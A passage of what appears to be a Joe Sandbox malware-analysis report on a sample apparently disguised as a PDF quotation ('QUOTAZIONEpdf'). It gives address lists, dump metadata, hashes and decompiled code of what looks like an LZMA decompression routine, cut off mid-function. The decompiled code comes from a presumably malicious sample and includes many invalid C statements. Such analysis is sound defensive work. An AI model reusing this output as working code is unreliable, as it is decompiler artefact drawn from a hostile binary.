                0x00406554
                0x00406557
                0x0040655a
                0x0040655a
                0x0040655f
                0x0040655f
                0x00406561
                0x00406564
                0x0040656b
                0x0040656e
                0x0040659b
                0x0040659b
                0x0040659e
                0x004065a1
                0x00406615
                0x00406615
                0x00406615
                0x00000000
                0x00406615
                0x004065a3
                0x004065a9
                0x004065ac
                0x004065af
                0x004065b2
                0x004065b5
                0x004065b8
                0x004065bb
                0x004065be
                0x004065c1
                0x004065c4
                0x004065dd
                0x004065df
                0x004065e2
                0x004065e3
                0x004065e6
                0x004065e8
                0x004065eb
                0x004065ed
                0x004065ef
                0x004065f2
                0x004065f4
                0x004065f7
                0x004065fb
                0x004065fd
                0x004065fd
                0x004065fe
                0x00406601
                0x00406604
                0x004065c6
                0x004065c6
                0x004065ce
                0x004065d3
                0x004065d5
                0x004065d8
                0x004065d8
                0x00406607
                0x0040660e
                0x00406598
                0x00406598
                0x00406598
                0x00406598
                0x00000000
                0x00406610
                0x00000000
                0x00406610
                0x0040660e
                0x00406521
                0x00406524
                0x00406526
                0x00406529
                0x0040652c
                0x0040652f
                0x00406531
                0x00406534
                0x00406537
                0x00406537
                0x0040653a
                0x0040653a
                0x0040653d
                0x00406544
                0x00406518
                0x00406518
                0x00406518
                0x00406518
                0x00000000
                0x00406546
                0x00000000
                0x00406546
                0x00406544
                0x004064ca
                0x004064cd
                0x004064cf
                0x004064d2
                0x00000000
                0x00000000
                0x00406231
                0x00406231
                0x00406235
                0x0040687a
                0x00000000
                0x0040687a
                0x0040623b
                0x0040623e
                0x00406241
                0x00406244
                0x00406247
                0x0040624a
                0x0040624d
                0x0040624f
                0x00406252
                0x00406255
                0x00406258
                0x0040625a
                0x0040625a
                0x0040625a
                0x00000000
                0x00000000
                0x004063bc
                0x004063bc
                0x004063c0
                0x00406886
                0x00000000
                0x00406886
                0x004063c6
                0x004063c9
                0x004063cc
                0x004063cf
                0x004063d1
                0x004063d1
                0x004063d1
                0x004063d4
                0x004063d7
                0x004063da
                0x004063dd
                0x004063e0
                0x004063e3
                0x004063e4
                0x004063e6
                0x004063e6
                0x004063e6
                0x004063e9
                0x004063ec
                0x004063ef
                0x004063f2
                0x004063f2
                0x004063f2
                0x004063f5
                0x004063f7
                0x004063f7
                0x00000000
                0x00000000
                0x00406639
                0x00406639
                0x00406639
                0x0040663d
                0x00000000
                0x00000000
                0x00406643
                0x00406646
                0x00406649
                0x0040664c
                0x0040664e
                0x0040664e
                0x0040664e
                0x00406651
                0x00406654
                0x00406657
                0x0040665a
                0x0040665d
                0x00406660
                0x00406661
                0x00406663
                0x00406663
                0x00406663
                0x00406666
                0x00406669
                0x0040666c
                0x0040666f
                0x00406672
                0x00406676
                0x00406678
                0x0040667b
                0x00000000
                0x0040667d
                0x004063fa
                0x004063fa
                0x00000000
                0x004063fa
                0x0040667b
                0x004068b0
                0x004068d2
                0x004068d8
                0x004068da
                0x004068e1
                0x004068e3
                0x004068ea
                0x004068ee
                0x00000000
                0x00405edf
                0x004068e7
                0x004068e7
                0x00000000
                0x004068e7
                0x00406734
                0x004067ba
                0x004067c0
                0x004067c3
                0x004067c6
                0x004067c9
                0x004067cc
                0x004067cf
                0x004067d2
                0x004067d5
                0x004067db
                0x004067f4
                0x004067f7
                0x004067fa
                0x004067fd
                0x00406801
                0x00406803
                0x00406804
                0x00406807
                0x004067dd
                0x004067dd
                0x004067e5
                0x004067ea
                0x004067ec
                0x004067ef
                0x004067ef
                0x00406811
                0x00000000
                0x00406813
                0x00000000
                0x00406813
                0x00406811
                0x00000000
                0x00406686

                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
                • Instruction ID: bb8ed6064adbc6ac752208bd1780db284a58169b415d1e5229999a4f541ad509
                • Opcode Fuzzy Hash: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
                • Instruction Fuzzy Hash: 11912271D00229CBDF28CF98C854BADBBB1FB44305F15816AD816BB291C7789A96DF44
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 98%
                			E00406398() {
                				unsigned short _t532;
                				signed int _t533;
                				void _t534;
                				void* _t535;
                				signed int _t536;
                				signed int _t565;
                				signed int _t568;
                				signed int _t589;
                				signed int* _t606;
                				void* _t613;
                
                				L0:
                				while(1) {
                					L0:
                					if( *(_t613 - 0x40) != 0) {
                						L89:
                						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                						L69:
                						_t606 =  *(_t613 - 0x58);
                						 *(_t613 - 0x84) = 0x12;
                						L132:
                						 *(_t613 - 0x54) = _t606;
                						L133:
                						_t532 =  *_t606;
                						_t589 = _t532 & 0x0000ffff;
                						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                						if( *(_t613 - 0xc) >= _t565) {
                							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                							 *(_t613 - 0x40) = 1;
                							_t533 = _t532 - (_t532 >> 5);
                							 *_t606 = _t533;
                						} else {
                							 *(_t613 - 0x10) = _t565;
                							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                						}
                						if( *(_t613 - 0x10) >= 0x1000000) {
                							L139:
                							_t534 =  *(_t613 - 0x84);
                							L140:
                							 *(_t613 - 0x88) = _t534;
                							goto L1;
                						} else {
                							L137:
                							if( *(_t613 - 0x6c) == 0) {
                								 *(_t613 - 0x88) = 5;
                								goto L170;
                							}
                							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                							goto L139;
                						}
                					} else {
                						if( *(__ebp - 0x60) == 0) {
                							L171:
                							_t536 = _t535 | 0xffffffff;
                							L172:
                							return _t536;
                						}
                						__eax = 0;
                						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                						0 | _t258 = _t258 + _t258 + 9;
                						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                						L75:
                						if( *(__ebp - 0x64) == 0) {
                							 *(__ebp - 0x88) = 0x1b;
                							L170:
                							_t568 = 0x22;
                							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                							_t536 = 0;
                							goto L172;
                						}
                						__eax =  *(__ebp - 0x14);
                						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                						if(__eax >=  *(__ebp - 0x74)) {
                							__eax = __eax +  *(__ebp - 0x74);
                						}
                						__edx =  *(__ebp - 8);
                						__cl =  *(__eax + __edx);
                						__eax =  *(__ebp - 0x14);
                						 *(__ebp - 0x5c) = __cl;
                						 *(__eax + __edx) = __cl;
                						__eax = __eax + 1;
                						__edx = 0;
                						_t274 = __eax %  *(__ebp - 0x74);
                						__eax = __eax /  *(__ebp - 0x74);
                						__edx = _t274;
                						__eax =  *(__ebp - 0x68);
                						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                						_t283 = __ebp - 0x64;
                						 *_t283 =  *(__ebp - 0x64) - 1;
                						 *( *(__ebp - 0x68)) = __cl;
                						L79:
                						 *(__ebp - 0x14) = __edx;
                						L80:
                						 *(__ebp - 0x88) = 2;
                					}
                					L1:
                					_t535 =  *(_t613 - 0x88);
                					if(_t535 > 0x1c) {
                						goto L171;
                					}
                					switch( *((intOrPtr*)(_t535 * 4 +  &M004068EF))) {
                						case 0:
                							if( *(_t613 - 0x6c) == 0) {
                								goto L170;
                							}
                							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                							_t535 =  *( *(_t613 - 0x70));
                							if(_t535 > 0xe1) {
                								goto L171;
                							}
                							_t539 = _t535 & 0x000000ff;
                							_push(0x2d);
                							asm("cdq");
                							_pop(_t570);
                							_push(9);
                							_pop(_t571);
                							_t609 = _t539 / _t570;
                							_t541 = _t539 % _t570 & 0x000000ff;
                							asm("cdq");
                							_t604 = _t541 % _t571 & 0x000000ff;
                							 *(_t613 - 0x3c) = _t604;
                							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                							_t612 = (0x300 << _t604 + _t609) + 0x736;
                							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                								L10:
                								if(_t612 == 0) {
                									L12:
                									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                									goto L15;
                								} else {
                									goto L11;
                								}
                								do {
                									L11:
                									_t612 = _t612 - 1;
                									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                								} while (_t612 != 0);
                								goto L12;
                							}
                							if( *(_t613 - 4) != 0) {
                								GlobalFree( *(_t613 - 4));
                							}
                							_t535 = GlobalAlloc(0x40, 0x600); // executed
                							 *(_t613 - 4) = _t535;
                							if(_t535 == 0) {
                								goto L171;
                							} else {
                								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                								goto L10;
                							}
                						case 1:
                							L13:
                							__eflags =  *(_t613 - 0x6c);
                							if( *(_t613 - 0x6c) == 0) {
                								 *(_t613 - 0x88) = 1;
                								goto L170;
                							}
                							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                							_t45 = _t613 - 0x48;
                							 *_t45 =  *(_t613 - 0x48) + 1;
                							__eflags =  *_t45;
                							L15:
                							if( *(_t613 - 0x48) < 4) {
                								goto L13;
                							}
                							_t547 =  *(_t613 - 0x40);
                							if(_t547 ==  *(_t613 - 0x74)) {
                								L20:
                								 *(_t613 - 0x48) = 5;
                								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                								goto L23;
                							}
                							 *(_t613 - 0x74) = _t547;
                							if( *(_t613 - 8) != 0) {
                								GlobalFree( *(_t613 - 8));
                							}
                							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                							 *(_t613 - 8) = _t535;
                							if(_t535 == 0) {
                								goto L171;
                							} else {
                								goto L20;
                							}
                						case 2:
                							L24:
                							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                							 *(_t613 - 0x84) = 6;
                							 *(_t613 - 0x4c) = _t554;
                							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                							goto L132;
                						case 3:
                							L21:
                							__eflags =  *(_t613 - 0x6c);
                							if( *(_t613 - 0x6c) == 0) {
                								 *(_t613 - 0x88) = 3;
                								goto L170;
                							}
                							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                							_t67 = _t613 - 0x70;
                							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                							__eflags =  *_t67;
                							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                							L23:
                							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                							if( *(_t613 - 0x48) != 0) {
                								goto L21;
                							}
                							goto L24;
                						case 4:
                							goto L133;
                						case 5:
                							goto L137;
                						case 6:
                							__edx = 0;
                							__eflags =  *(__ebp - 0x40);
                							if( *(__ebp - 0x40) != 0) {
                								__eax =  *(__ebp - 4);
                								__ecx =  *(__ebp - 0x38);
                								 *(__ebp - 0x34) = 1;
                								 *(__ebp - 0x84) = 7;
                								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                								goto L132;
                							}
                							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                							__esi =  *(__ebp - 0x60);
                							__cl = 8;
                							__cl = 8 -  *(__ebp - 0x3c);
                							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                							__ecx =  *(__ebp - 0x3c);
                							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                							__ecx =  *(__ebp - 4);
                							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                							__eflags =  *(__ebp - 0x38) - 4;
                							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                							if( *(__ebp - 0x38) >= 4) {
                								__eflags =  *(__ebp - 0x38) - 0xa;
                								if( *(__ebp - 0x38) >= 0xa) {
                									_t98 = __ebp - 0x38;
                									 *_t98 =  *(__ebp - 0x38) - 6;
                									__eflags =  *_t98;
                								} else {
                									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                								}
                							} else {
                								 *(__ebp - 0x38) = 0;
                							}
                							__eflags =  *(__ebp - 0x34) - __edx;
                							if( *(__ebp - 0x34) == __edx) {
                								__ebx = 0;
                								__ebx = 1;
                								goto L61;
                							} else {
                								__eax =  *(__ebp - 0x14);
                								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                								__eflags = __eax -  *(__ebp - 0x74);
                								if(__eax >=  *(__ebp - 0x74)) {
                									__eax = __eax +  *(__ebp - 0x74);
                									__eflags = __eax;
                								}
                								__ecx =  *(__ebp - 8);
                								__ebx = 0;
                								__ebx = 1;
                								__al =  *((intOrPtr*)(__eax + __ecx));
                								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                								goto L41;
                							}
                						case 7:
                							__eflags =  *(__ebp - 0x40) - 1;
                							if( *(__ebp - 0x40) != 1) {
                								__eax =  *(__ebp - 0x24);
                								 *(__ebp - 0x80) = 0x16;
                								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                								__eax =  *(__ebp - 0x28);
                								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                								__eax =  *(__ebp - 0x2c);
                								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                								__eax = 0;
                								__eflags =  *(__ebp - 0x38) - 7;
                								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                								__al = __al & 0x000000fd;
                								__eax = (__eflags >= 0) - 1 + 0xa;
                								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                								__eax =  *(__ebp - 4);
                								__eax =  *(__ebp - 4) + 0x664;
                								__eflags = __eax;
                								 *(__ebp - 0x58) = __eax;
                								goto L69;
                							}
                							__eax =  *(__ebp - 4);
                							__ecx =  *(__ebp - 0x38);
                							 *(__ebp - 0x84) = 8;
                							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                							goto L132;
                						case 8:
                							__eflags =  *(__ebp - 0x40);
                							if( *(__ebp - 0x40) != 0) {
                								__eax =  *(__ebp - 4);
                								__ecx =  *(__ebp - 0x38);
                								 *(__ebp - 0x84) = 0xa;
                								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                							} else {
                								__eax =  *(__ebp - 0x38);
                								__ecx =  *(__ebp - 4);
                								__eax =  *(__ebp - 0x38) + 0xf;
                								 *(__ebp - 0x84) = 9;
                								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                							}
                							goto L132;
                						case 9:
                							goto L0;
                						case 0xa:
                							__eflags =  *(__ebp - 0x40);
                							if( *(__ebp - 0x40) != 0) {
                								__eax =  *(__ebp - 4);
                								__ecx =  *(__ebp - 0x38);
                								 *(__ebp - 0x84) = 0xb;
                								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                								goto L132;
                							}
                							__eax =  *(__ebp - 0x28);
                							goto L88;
                						case 0xb:
                							__eflags =  *(__ebp - 0x40);
                							if( *(__ebp - 0x40) != 0) {
                								__ecx =  *(__ebp - 0x24);
                								__eax =  *(__ebp - 0x20);
                								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                							} else {
                								__eax =  *(__ebp - 0x24);
                							}
                							__ecx =  *(__ebp - 0x28);
                							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                							L88:
                							__ecx =  *(__ebp - 0x2c);
                							 *(__ebp - 0x2c) = __eax;
                							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                							goto L89;
                						case 0xc:
                							L99:
                							__eflags =  *(__ebp - 0x6c);
                							if( *(__ebp - 0x6c) == 0) {
                								 *(__ebp - 0x88) = 0xc;
                								goto L170;
                							}
                							__ecx =  *(__ebp - 0x70);
                							__eax =  *(__ebp - 0xc);
                							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                							_t334 = __ebp - 0x70;
                							 *_t334 =  *(__ebp - 0x70) + 1;
                							__eflags =  *_t334;
                							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                							__eax =  *(__ebp - 0x2c);
                							goto L101;
                						case 0xd:
                							L37:
                							__eflags =  *(__ebp - 0x6c);
                							if( *(__ebp - 0x6c) == 0) {
                								 *(__ebp - 0x88) = 0xd;
                								goto L170;
                							}
                							__ecx =  *(__ebp - 0x70);
                							__eax =  *(__ebp - 0xc);
                							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                							_t122 = __ebp - 0x70;
                							 *_t122 =  *(__ebp - 0x70) + 1;
                							__eflags =  *_t122;
                							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                							L39:
                							__eax =  *(__ebp - 0x40);
                							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                								goto L48;
                							}
                							__eflags = __ebx - 0x100;
                							if(__ebx >= 0x100) {
                								goto L54;
                							}
                							L41:
                							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                							__ecx =  *(__ebp - 0x58);
                							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                							 *(__ebp - 0x48) = __eax;
                							__eax = __eax + 1;
                							__eax = __eax << 8;
                							__eax = __eax + __ebx;
                							__esi =  *(__ebp - 0x58) + __eax * 2;
                							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                							__ax =  *__esi;
                							 *(__ebp - 0x54) = __esi;
                							__edx = __ax & 0x0000ffff;
                							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                							__eflags =  *(__ebp - 0xc) - __ecx;
                							if( *(__ebp - 0xc) >= __ecx) {
                								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                								__cx = __ax;
                								 *(__ebp - 0x40) = 1;
                								__cx = __ax >> 5;
                								__eflags = __eax;
                								__ebx = __ebx + __ebx + 1;
                								 *__esi = __ax;
                							} else {
                								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                								 *(__ebp - 0x10) = __ecx;
                								0x800 = 0x800 - __edx;
                								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                								__ebx = __ebx + __ebx;
                								 *__esi = __cx;
                							}
                							__eflags =  *(__ebp - 0x10) - 0x1000000;
                							 *(__ebp - 0x44) = __ebx;
                							if( *(__ebp - 0x10) >= 0x1000000) {
                								goto L39;
                							} else {
                								goto L37;
                							}
                						case 0xe:
                							L46:
                							__eflags =  *(__ebp - 0x6c);
                							if( *(__ebp - 0x6c) == 0) {
                								 *(__ebp - 0x88) = 0xe;
                								goto L170;
                							}
                							__ecx =  *(__ebp - 0x70);
                							__eax =  *(__ebp - 0xc);
                							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                							_t156 = __ebp - 0x70;
                							 *_t156 =  *(__ebp - 0x70) + 1;
                							__eflags =  *_t156;
                							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                							while(1) {
                								L48:
                								__eflags = __ebx - 0x100;
                								if(__ebx >= 0x100) {
                									break;
                								}
                								__eax =  *(__ebp - 0x58);
                								__edx = __ebx + __ebx;
                								__ecx =  *(__ebp - 0x10);
                								__esi = __edx + __eax;
                								__ecx =  *(__ebp - 0x10) >> 0xb;
                								__ax =  *__esi;
                								 *(__ebp - 0x54) = __esi;
                								__edi = __ax & 0x0000ffff;
                								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                								__eflags =  *(__ebp - 0xc) - __ecx;
                								if( *(__ebp - 0xc) >= __ecx) {
                									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                									__cx = __ax;
                									_t170 = __edx + 1; // 0x1
                									__ebx = _t170;
                									__cx = __ax >> 5;
                									__eflags = __eax;
                									 *__esi = __ax;
                								} else {
                									 *(__ebp - 0x10) = __ecx;
                									0x800 = 0x800 - __edi;
                									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                									__ebx = __ebx + __ebx;
                									 *__esi = __cx;
                								}
                								__eflags =  *(__ebp - 0x10) - 0x1000000;
                								 *(__ebp - 0x44) = __ebx;
                								if( *(__ebp - 0x10) >= 0x1000000) {
                									continue;
                								} else {
                									goto L46;
                								}
                							}
                							L54:
                							_t173 = __ebp - 0x34;
                							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                							__eflags =  *_t173;
                							goto L55;
                						case 0xf:
                							L58:
                							__eflags =  *(__ebp - 0x6c);
                							if( *(__ebp - 0x6c) == 0) {
                								 *(__ebp - 0x88) = 0xf;
                								goto L170;
                							}
                							__ecx =  *(__ebp - 0x70);
                							__eax =  *(__ebp - 0xc);
                							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                							_t203 = __ebp - 0x70;
                							 *_t203 =  *(__ebp - 0x70) + 1;
                							__eflags =  *_t203;
                							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                							L60:
                							__eflags = __ebx - 0x100;
                							if(__ebx >= 0x100) {
                								L55:
                								__al =  *(__ebp - 0x44);
                								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                								goto L56;
                							}
                							L61:
                							__eax =  *(__ebp - 0x58);
                							__edx = __ebx + __ebx;
                							__ecx =  *(__ebp - 0x10);
                							__esi = __edx + __eax;
                							__ecx =  *(__ebp - 0x10) >> 0xb;
                							__ax =  *__esi;
                							 *(__ebp - 0x54) = __esi;
                							__edi = __ax & 0x0000ffff;
                							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                							__eflags =  *(__ebp - 0xc) - __ecx;
                							if( *(__ebp - 0xc) >= __ecx) {
                								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                								__cx = __ax;
                								_t217 = __edx + 1; // 0x1
                								__ebx = _t217;
                								__cx = __ax >> 5;
                								__eflags = __eax;
                								 *__esi = __ax;
                							} else {
                								 *(__ebp - 0x10) = __ecx;
                								0x800 = 0x800 - __edi;
                								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                								__ebx = __ebx + __ebx;
                								 *__esi = __cx;
                							}
                							__eflags =  *(__ebp - 0x10) - 0x1000000;
                							 *(__ebp - 0x44) = __ebx;
                							if( *(__ebp - 0x10) >= 0x1000000) {
                								goto L60;
                							} else {
                								goto L58;
                							}
                						case 0x10:
                							L109:
                							__eflags =  *(__ebp - 0x6c);
                							if( *(__ebp - 0x6c) == 0) {
                								 *(__ebp - 0x88) = 0x10;
                								goto L170;
                							}
                							__ecx =  *(__ebp - 0x70);
                							__eax =  *(__ebp - 0xc);
                							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                							_t365 = __ebp - 0x70;
                							 *_t365 =  *(__ebp - 0x70) + 1;
                							__eflags =  *_t365;
                							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                							goto L111;
                						case 0x11:
                							goto L69;
                						case 0x12:
                							__eflags =  *(__ebp - 0x40);
                							if( *(__ebp - 0x40) != 0) {
                								__eax =  *(__ebp - 0x58);
                								 *(__ebp - 0x84) = 0x13;
                								__esi =  *(__ebp - 0x58) + 2;
                								goto L132;
                							}
                							__eax =  *(__ebp - 0x4c);
                							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                							__ecx =  *(__ebp - 0x58);
                							__eax =  *(__ebp - 0x4c) << 4;
                							__eflags = __eax;
                							__eax =  *(__ebp - 0x58) + __eax + 4;
                							goto L130;
                						case 0x13:
                							__eflags =  *(__ebp - 0x40);
                							if( *(__ebp - 0x40) != 0) {
                								_t469 = __ebp - 0x58;
                								 *_t469 =  *(__ebp - 0x58) + 0x204;
                								__eflags =  *_t469;
                								 *(__ebp - 0x30) = 0x10;
                								 *(__ebp - 0x40) = 8;
                								L144:
                								 *(__ebp - 0x7c) = 0x14;
                								goto L145;
                							}
                							__eax =  *(__ebp - 0x4c);
                							__ecx =  *(__ebp - 0x58);
                							__eax =  *(__ebp - 0x4c) << 4;
                							 *(__ebp - 0x30) = 8;
                							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                							L130:
                							 *(__ebp - 0x58) = __eax;
                							 *(__ebp - 0x40) = 3;
                							goto L144;
                						case 0x14:
                							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                							__eax =  *(__ebp - 0x80);
                							goto L140;
                						case 0x15:
                							__eax = 0;
                							__eflags =  *(__ebp - 0x38) - 7;
                							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                							__al = __al & 0x000000fd;
